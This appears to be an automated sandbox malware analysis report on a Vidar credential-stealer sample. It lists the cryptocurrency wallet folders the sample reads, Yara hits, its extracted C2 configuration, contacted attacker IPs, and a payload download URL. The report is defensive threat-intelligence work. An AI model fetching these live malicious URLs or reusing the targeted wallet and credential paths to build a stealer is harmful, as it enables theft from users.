Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	File opened: C:\Users\user\AppData\Roaming\Binance\	Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\	Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\	Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\	Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\	Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\	Jump to behavior

Yara detected Credential Stealer

Source: Yara match	File source: Process Memory Space: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe PID: 6448, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 1596, type: MEMORYSTR

Remote Access Functionality

Yara detected Vidar

Source: Yara match

File source: sslproxydump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match	File source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, type: SAMPLE
Source: Yara match	File source: 0.2.a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe.3d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.EHDHIDAEHC.exe.439a680.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.EHDHIDAEHC.exe.436ce50.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.EHDHIDAEHC.exe.3e931c0.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.EHDHIDAEHC.exe.3ec09f0.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe.3d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.EHDHIDAEHC.exe.439a680.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.MSBuild.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.MSBuild.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.EHDHIDAEHC.exe.436ce50.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.EHDHIDAEHC.exe.3ec09f0.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.EHDHIDAEHC.exe.3e931c0.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.2094707680.000000000436C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2094707680.0000000003EC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2092269679.0000000002FC9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.1698830320.00000000003F0000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2094707680.000000000439A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2173978549.00000000003F0000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2343148482.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2094707680.0000000003E93000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2021713393.000000000325C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2174954399.0000000003237000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe PID: 6448, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: EHDHIDAEHC.exe PID: 5460, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 1596, type: MEMORYSTR

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C480C40 sqlite3_bind_zeroblob,	0_2_6C480C40
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C480D60 sqlite3_bind_parameter_name,	0_2_6C480D60
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C3A8EA0 sqlite3_clear_bindings,	0_2_6C3A8EA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_1FE91FE0 sqlite3_mprintf,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,	6_2_1FE91FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_1FE8DFC0 sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_mprintf,sqlite3_bind_text,sqlite3_step,sqlite3_reset,	6_2_1FE8DFC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_1FE25C70 sqlite3_prepare_v3,sqlite3_bind_int64,sqlite3_step,sqlite3_column_value,sqlite3_result_value,sqlite3_reset,	6_2_1FE25C70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_1FE8DB10 sqlite3_initialize,sqlite3_bind_int64,sqlite3_step,sqlite3_column_bytes,sqlite3_column_blob,sqlite3_reset,sqlite3_free,sqlite3_free,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_free,	6_2_1FE8DB10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_1FF3D9E0 sqlite3_bind_int64,sqlite3_log,sqlite3_log,sqlite3_log,sqlite3_bind_int64,sqlite3_log,sqlite3_log,sqlite3_log,	6_2_1FF3D9E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_1FEB5910 sqlite3_mprintf,sqlite3_bind_int64,	6_2_1FEB5910
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_1FEED610 sqlite3_free,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,	6_2_1FEED610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_1FEB55B0 sqlite3_bind_int64,sqlite3_step,sqlite3_reset,	6_2_1FEB55B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_1FF3D4F0 sqlite3_bind_value,sqlite3_log,sqlite3_log,sqlite3_log,	6_2_1FF3D4F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_1FF314D0 sqlite3_bind_int64,sqlite3_log,sqlite3_log,sqlite3_log,	6_2_1FF314D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_1FECD3B0 sqlite3_bind_int64,sqlite3_step,sqlite3_reset,	6_2_1FECD3B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_1FEB51D0 sqlite3_mprintf,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,	6_2_1FEB51D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_1FEA9090 sqlite3_reset,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_errmsg,sqlite3_mprintf,	6_2_1FEA9090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_1FE40FB0 sqlite3_result_int64,sqlite3_result_double,sqlite3_result_int,sqlite3_prepare_v3,sqlite3_bind_int64,sqlite3_step,sqlite3_column_value,sqlite3_result_value,sqlite3_reset,	6_2_1FE40FB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_1FEF4D40 sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_reset,InitOnceBeginInitialize,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_free,	6_2_1FEF4D40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_1FE24820 sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_reset,sqlite3_initialize,	6_2_1FE24820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_1FE606E0 sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,	6_2_1FE606E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_1FE38680 sqlite3_mprintf,sqlite3_mprintf,sqlite3_initialize,sqlite3_finalize,sqlite3_free,sqlite3_mprintf,sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_int64,	6_2_1FE38680
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_1FE68550 sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_reset,	6_2_1FE68550
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_1FE88200 sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_bind_int64,sqlite3_step,sqlite3_column_int,sqlite3_reset,	6_2_1FE88200
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_1FEF37E0 sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,	6_2_1FEF37E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_1FED3770 sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,	6_2_1FED3770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_1FE3B400 sqlite3_mprintf,sqlite3_mprintf,sqlite3_free,sqlite3_bind_value,sqlite3_reset,sqlite3_step,sqlite3_reset,sqlite3_column_int64,	6_2_1FE3B400
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_1FE6EF30 sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_result_error_code,	6_2_1FE6EF30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_1FE8A6F0 sqlite3_mprintf,sqlite3_mprintf,sqlite3_mprintf,sqlite3_free,sqlite3_bind_value,	6_2_1FE8A6F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_1FE266C0 sqlite3_mprintf,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_bind_null,sqlite3_bind_blob,sqlite3_bind_value,sqlite3_free,sqlite3_bind_value,sqlite3_step,sqlite3_reset,	6_2_1FE266C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_1FE7E200 sqlite3_initialize,sqlite3_free,sqlite3_bind_int64,sqlite3_bind_blob,sqlite3_step,sqlite3_reset,	6_2_1FE7E200
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_1FE8E170 sqlite3_bind_int64,sqlite3_step,sqlite3_reset,	6_2_1FE8E170
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_1FE7E090 sqlite3_bind_int64,sqlite3_bind_value,sqlite3_step,sqlite3_reset,	6_2_1FE7E090

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
104.102.49.249	steamcommunity.com	United States	16625	AKAMAI-ASUS	true
38.180.132.96	arpdabl.zapto.org	United States	174	COGENT-174US	false
147.45.44.104	unknown	Russian Federation	2895	FREE-NET-ASFREEnetEU	false
168.119.176.241	unknown	Germany	24940	HETZNER-ASDE	false

Contacted Domains

Name	IP	Active
steamcommunity.com	104.102.49.249	true
arpdabl.zapto.org	38.180.132.96	true
fp2e7a.wpc.phicdn.net	192.229.221.95	true

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://168.119.176.241/vcruntime140.dll	false	3%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://168.119.176.241/msvcp140.dll	false	2%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://168.119.176.241/softokn3.dll	true	Avira URL Cloud: malware	unknown
http://147.45.44.104/steals/mine.exe	false	Avira URL Cloud: safe	unknown

AV Detection

Antivirus detection for URL or domain

Source: https://168.119.176.241/r	Avira URL Cloud: Label: malware
Source: https://168.119.176.241/s	Avira URL Cloud: Label: malware
Source: https://168.119.176.241/t	Avira URL Cloud: Label: malware
Source: https://168.119.176.241/qo	Avira URL Cloud: Label: malware
Source: https://168.119.176.241/z:O	Avira URL Cloud: Label: malware
Source: https://168.119.176.241/r5	Avira URL Cloud: Label: malware
Source: https://steamcommunity.com/profiles/76561199747278259/badges	Avira URL Cloud: Label: malware
Source: https://168.119.176.241/259H	Avira URL Cloud: Label: malware
Source: https://168.119.176.241/K	Avira URL Cloud: Label: malware
Source: https://168.119.176.241/ECD	Avira URL Cloud: Label: malware
Source: https://168.119.176.241/0	Avira URL Cloud: Label: malware
Source: https://168.119.176.241/RCHAR	Avira URL Cloud: Label: malware
Source: https://168.119.176.241/8	Avira URL Cloud: Label: malware
Source: https://168.119.176.241/6	Avira URL Cloud: Label: malware
Source: https://168.119.176.241/$	Avira URL Cloud: Label: malware
Source: https://168.119.176.241/vcruntime140.dll	Avira URL Cloud: Label: malware
Source: https://168.119.176.241/&	Avira URL Cloud: Label: malware
Source: https://168.119.176.241/sqls.dllI	Avira URL Cloud: Label: malware
Source: https://168.119.176.241/msvcp140.dll	Avira URL Cloud: Label: malware
Source: https://168.119.176.241/sqls.dll_	Avira URL Cloud: Label: malware
Source: https://168.119.176.241/graphy	Avira URL Cloud: Label: malware
Source: https://steamcommunity.com/profiles/76561199747278259/inventory/	Avira URL Cloud: Label: malware
Source: https://168.119.176.241	Avira URL Cloud: Label: malware
Source: https://168.119.176.241/nss3.dllf	Avira URL Cloud: Label: malware
Source: https://168.119.176.241/41	Avira URL Cloud: Label: malware
Source: https://168.119.176.241/key%	Avira URL Cloud: Label: malware
Source: https://168.119.176.241/(%f	Avira URL Cloud: Label: malware
Source: https://168.119.176.241/s_1l	Avira URL Cloud: Label: malware
Source: https://168.119.176.241/softokn3.dll	Avira URL Cloud: Label: malware
Source: https://168.119.176.241/mozglue.dllU	Avira URL Cloud: Label: malware
Source: https://168.119.176.241/Microsoft	Avira URL Cloud: Label: malware

Found malware configuration

Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe

Malware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199747278259"], "Botnet": "625d7a8e379321656ff1b88ebf9542b7"}

Multi AV Scanner detection for domain / URL

Source: arpdabl.zapto.org	Virustotal: Detection: 12%	Perma Link
Source: https://168.119.176.241/0	Virustotal: Detection: 13%	Perma Link
Source: https://168.119.176.241/6	Virustotal: Detection: 13%	Perma Link
Source: https://168.119.176.241/8	Virustotal: Detection: 13%	Perma Link

Multi AV Scanner detection for dropped file

Source: C:\ProgramData\EHDHIDAEHC.exe	ReversingLabs: Detection: 36%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\mine[1].exe	ReversingLabs: Detection: 36%

Multi AV Scanner detection for submitted file

Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe

Virustotal: Detection: 60%

Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\mine[1].exe	Joe Sandbox ML: detected
Source: C:\ProgramData\EHDHIDAEHC.exe	Joe Sandbox ML: detected

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_003D6D50 CryptUnprotectData,LocalAlloc,LocalFree,	0_2_003D6D50
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_003D6CD0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	0_2_003D6CD0
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_003D8980 memset,lstrlenA,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,memcpy,PK11_FreeSlot,lstrcatA,PK11_FreeSlot,lstrcatA,	0_2_003D8980
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_003E0DF0 CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA,	0_2_003E0DF0
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C2A6C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer,	0_2_6C2A6C80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_00406D50 CryptUnprotectData,LocalAlloc,LocalFree,	6_2_00406D50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_00406CD0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	6_2_00406CD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_00410DF0 CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA,	6_2_00410DF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_00408980 memset,lstrlenA,CryptStringToBinaryA,memcpy,lstrcatA,lstrcatA,	6_2_00408980

Uses 32bit PE files

Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 104.102.49.249:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 168.119.176.241:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.102.49.249:443 -> 192.168.2.4:49764 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 168.119.176.241:443 -> 192.168.2.4:49765 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 168.119.176.241:443 -> 192.168.2.4:49773 version: TLS 1.2

Source:	Binary string: mozglue.pdbP source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2188073732.00000000358C9000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2206774883.000000006C30D000.00000002.00000001.01000000.00000008.sdmp, mozglue.dll.0.dr
Source:	Binary string: freebl3.pdb source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2185251178.000000002F952000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.0.dr
Source:	Binary string: freebl3.pdbp source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2185251178.000000002F952000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.0.dr
Source:	Binary string: nss3.pdb@ source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2200231222.000000004D676000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2207204540.000000006C4CF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr
Source:	Binary string: minelabfoto.pdb( source: mine[1].exe.0.dr, EHDHIDAEHC.exe.0.dr
Source:	Binary string: minelabfoto.pdb source: EHDHIDAEHC.exe, 00000004.00000000.2083490533.0000000000602000.00000002.00000001.01000000.00000009.sdmp, mine[1].exe.0.dr, EHDHIDAEHC.exe.0.dr
Source:	Binary string: PE.pdbH] source: EHDHIDAEHC.exe, 00000004.00000002.2092269679.0000000002E61000.00000004.00000800.00020000.00000000.sdmp, EHDHIDAEHC.exe, 00000004.00000002.2097766953.00000000053B0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Users\press\AppData\Local\Temp\Report.A66214F7-6635-4084-8609-050NK772Dll\obj\Debug\kfqXL.pdb source: EHDHIDAEHC.exe, 00000004.00000002.2094707680.000000000426C000.00000004.00000800.00020000.00000000.sdmp, EHDHIDAEHC.exe, 00000004.00000002.2094707680.0000000003FFE000.00000004.00000800.00020000.00000000.sdmp, EHDHIDAEHC.exe, 00000004.00000002.2098035068.0000000005634000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: softokn3.pdb@ source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2193997292.00000000417A2000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.0.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2197298605.0000000047710000.00000004.00000020.00020000.00000000.sdmp, vcruntime140.dll.0.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2191144720.000000003B838000.00000004.00000020.00020000.00000000.sdmp, msvcp140.dll.0.dr
Source:	Binary string: PE.pdb source: EHDHIDAEHC.exe, 00000004.00000002.2092269679.0000000002E61000.00000004.00000800.00020000.00000000.sdmp, EHDHIDAEHC.exe, 00000004.00000002.2097766953.00000000053B0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: nss3.pdb source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2200231222.000000004D676000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2207204540.000000006C4CF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr
Source:	Binary string: mozglue.pdb source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2188073732.00000000358C9000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2206774883.000000006C30D000.00000002.00000001.01000000.00000008.sdmp, mozglue.dll.0.dr
Source:	Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2181684903.0000000025178000.00000002.00001000.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2181945016.00000000276BB000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2356461481.0000000020028000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2349842336.000000001A0B7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: softokn3.pdb source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2193997292.00000000417A2000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.0.dr

Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_003D1110 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_003D1110
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_003D99F0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	0_2_003D99F0
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_003E5EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_003E5EA0
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_003DC2E0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_003DC2E0
